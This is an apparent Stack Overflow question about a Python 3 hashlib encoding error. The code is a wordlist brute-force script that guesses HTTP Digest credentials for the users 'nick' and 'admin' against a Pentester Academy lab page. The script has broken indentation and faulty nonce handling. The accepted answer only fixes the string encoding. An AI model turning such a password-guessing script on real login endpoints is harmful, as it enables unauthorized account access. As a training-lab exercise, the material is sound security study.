# cant get encoding to work in python 3

Tags: python-3.x, encoding, hashlib

I have created a program and from what I understand from the error shown below and from other posts on Stack, I need to encode the object before it can be hashed.

I have tried several ways to do this but still keep getting the same error message. provided below is my code and also a list of changes I have tried.

I understand what needs to be done but I guess I'm putting the code in the wrong place or the syntax is wrong as what I am trying isn't working.

any help is much appreciated.

**Error Message**

```
    ha1 = hashlib.md5(user + ':' + realm + ':' + password.strip()).hexdigest()
    TypeError: Unicode-objects must be encoded before hashing
```

**Code**

```
import sys
import requests
import hashlib

realm = "Pentester Academy"


lines = [line.rstrip('\n') for line in open('wordl2.txt')]

print (lines)

for user in ['nick', 'admin']:
get_response = requests.get("http://pentesteracademylab.appspot.com/lab/webapp/digest2/1")
test_creds = get_response

print (test_creds)

for password in lines:


    # not the correct way but works for this challenge

    snounce = test_creds.headers.get('www-authenticate').split('"')
    uri = "/lab/webapp/digest2/1"

    # create the HTTP Digest
    ha1 = hashlib.md5(user + ':' + realm + ':' + password.strip()).hexdigest()

    ha2 = hashlib.md5("GET:" + uri).hexdigest()

    response = hashlib.md5(ha1 + ':' + snounce + ':' + ha2).hexdigest()

    header_string = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"' % (user, realm, snounce, uri, response)
    headers = { 'Authorization' : header_string }

    test_creds = requests.get("http://pentesteracademylab.appspot.com/lab/webapp/digest2/1", headers = headers)

    if test_creds.status_code == 200:
        print ("CRACKED: %s:%s" % (user,password))
        break
    elif test_creds.status_code == 401:
        print ("FAILED: %s:%s" % (user,password))
    else:
        print ("unexpected Status code: %d " % test_creds.status_code)
```

**Attempted Changes**

```
password.encode(utf-8)

----------------------

hashlib.md5().update(password.encode(lines.encoding))

---------------

lines = [line.rstrip('\n') for line in open('wordl2.txt', "rb")]
```

Answer (score 0, accepted):

I have managed to solve my own problem using the line

```
pass2 = str.encode(password)
```

just inside the password for loop